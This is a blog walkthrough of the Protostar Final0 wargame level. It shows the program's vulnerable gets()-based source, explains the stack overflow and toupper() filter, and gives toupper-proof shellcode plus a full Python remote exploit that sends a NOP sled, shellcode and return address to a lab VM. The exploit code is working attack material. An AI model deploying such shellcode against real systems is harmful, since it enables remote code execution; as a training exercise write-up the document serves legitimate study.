Skip to main content

Binary Exploitation Protostar Final0 - Walkthrough

Hello Guys,



Today In This post, I am going to share with you my walk through experience of Exploit Exercise Proto Star Final0 Level.


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb
  • Do Some Research About Heap overflow exploitation.
  •  All Credit Related To Exploit Exercise War Games Goes To exploit-exercises.com.

let's Start

Hint


This level combines a stack overflow and network programming for a remote overflow.

Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.

Core files will be in /tmp.

This level is at /opt/protostar/bin/final0

Source Code


#include "../common/common.c"

#define NAME "final0"
#define UID 0
#define GID 0
#define PORT 2995

/*
 * Read the username in from the network
 */

char *get_username()
{
  char buffer[512];
  char *q;
  int i;

  memset(buffer, 0, sizeof(buffer));
  gets(buffer);

  /* Strip off trailing new line characters */
  q = strchr(buffer, '\n');
  if(q) *q = 0;
  q = strchr(buffer, '\r');
  if(q) *q = 0;

  /* Convert to lower case */
  for(i = 0; i < strlen(buffer); i++) {
      buffer[i] = toupper(buffer[i]);
  }

  /* Duplicate the string and return it */
  return strdup(buffer);
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  username = get_username();
  
  printf("No such user %s\n", username);
}


Description

Well, Friends Honestly. After Reading Source Code of this Program. I Detected Buffer Overflow Vulnerability Just In 2 Minutes.

here,
  gets(buffer);

Because In Our Previous Level We Already Encounter This Function Vulnerability.
But Then my mind detected a problem.

  /* Convert to lower case */
  for(i = 0; i < strlen(buffer); i++) {
      buffer[i] = toupper(buffer[i]);
  }

Well, Those Who are not understanding what actually this codes does. This codes change
all lowercase letter into Upper case. So, Now We need to find a shellcode that can easily
bypass this condition. After Googling I Got Below Shellcode from Exploit-db.

Shellcode


#########################################################################################
#                   Shellcode Manufacturing Section
#########################################################################################


# to_upper shellcode
upper_shellcode = ''
#/* _start */
upper_shellcode += "\xeb\x02" #  /* jmp short A          */

#/* A */
upper_shellcode += "\xeb\x05" #   /* jmp short C          */

# /* B */
upper_shellcode += "\xe8\xf9\xff\xff\xff" # /* call A               */

#  /* C */
upper_shellcode += "\x5f"   # /* pop edi              */
upper_shellcode += "\x81\xef\xdf\xff\xff\xff" #/* sub edi, 0xffffffdf  */
upper_shellcode += "\x57"          #  /* push edi             */
upper_shellcode += "\x5e"           #  /* pop esi              */
upper_shellcode += "\x29\xc9"   #/* sub ecx, ecx         */
upper_shellcode += "\x80\xc1\xb8"  # /* add cl, 0xb8         */

#  /* bucle */
upper_shellcode += "\x8a\x07"   #  /* mov al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\xc0\xe0\x04" #   /* shl al, 4            */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x02\x07"   #  /* add al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\x88\x06"   #  /* mov byte [esi], al   */
upper_shellcode += "\x46"   #   /* inc esi              */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x49"   #   /* dec ecx              */
upper_shellcode += "\xe2\xed"   #  /* loop bucle           */

# /* Shellcode codificada de 184 (0xb8) bytes */
upper_shellcode += "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB"
upper_shellcode += "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA"
upper_shellcode += "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO"
upper_shellcode += "BLAALMNIA"

Well, Game Over

Exploit

#!/usr/bin/python
import struct
import socket







#########################################################################################
#                   Shellcode Manufacturing Section
#########################################################################################


# to_upper shellcode
upper_shellcode = ''
#/* _start */
upper_shellcode += "\xeb\x02" #  /* jmp short A          */

#/* A */
upper_shellcode += "\xeb\x05" #   /* jmp short C          */

# /* B */
upper_shellcode += "\xe8\xf9\xff\xff\xff" # /* call A               */

#  /* C */
upper_shellcode += "\x5f"   # /* pop edi              */
upper_shellcode += "\x81\xef\xdf\xff\xff\xff" #/* sub edi, 0xffffffdf  */
upper_shellcode += "\x57"          #  /* push edi             */
upper_shellcode += "\x5e"           #  /* pop esi              */
upper_shellcode += "\x29\xc9"   #/* sub ecx, ecx         */
upper_shellcode += "\x80\xc1\xb8"  # /* add cl, 0xb8         */

#  /* bucle */
upper_shellcode += "\x8a\x07"   #  /* mov al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\xc0\xe0\x04" #   /* shl al, 4            */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x02\x07"   #  /* add al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\x88\x06"   #  /* mov byte [esi], al   */
upper_shellcode += "\x46"   #   /* inc esi              */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x49"   #   /* dec ecx              */
upper_shellcode += "\xe2\xed"   #  /* loop bucle           */

# /* Shellcode codificada de 184 (0xb8) bytes */
upper_shellcode += "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB"
upper_shellcode += "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA"
upper_shellcode += "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO"
upper_shellcode += "BLAALMNIA"


shellcode = upper_shellcode

shellcode+= '\x90'*120
#####################################################################################
#                Payload Sending Section
#####################################################################################


# Shellcode Length
slen = len(upper_shellcode)

# Victim Configuration
PORT = 2995
HOST = "192.168.56.101"

BuffSize = 532 # Don't Include EIP Padding Length
RETPoint =  0xbffffa50 # Return Pointer Pointing


# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Connect Socket 
s.connect((HOST, PORT))


# Payload Generating Here
payload = ''


# Load NOP + Shellcode
payload+= '\x90'*(BuffSize-len(shellcode)) + shellcode

# Load EIP pointer
payload+= struct.pack("I", RETPoint ) # Return Address

# Additional Data
payload+= '\n'

# Send payload
s.send(payload)

# Check output
#print s.recv(1024)



# Close
s.close()

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Comments

Related Post

Top Visited

Create Simple Packet Sniffer Using Python

how to install burp suite in Linux/Ubuntu 16.04

Big List Of Google Dorks For Sqli Injection

List of Keyboard Shortcuts Keys for GNOME Desktop (Kali linux / Linux / Ubuntu/*nix )

Latest Google Dorks List

How to create Phishing Page Using Kali Linux | Webpage Page Cloning Using Kali Linux Social Engineering Toolkit

how to configure burpsuite with firefox?

What is the use of Pseudo header in TCP/UDP packets?

Python Beautiful Soup Module - Tutorial - Part 2

Create Ping Sweeping Script Using Python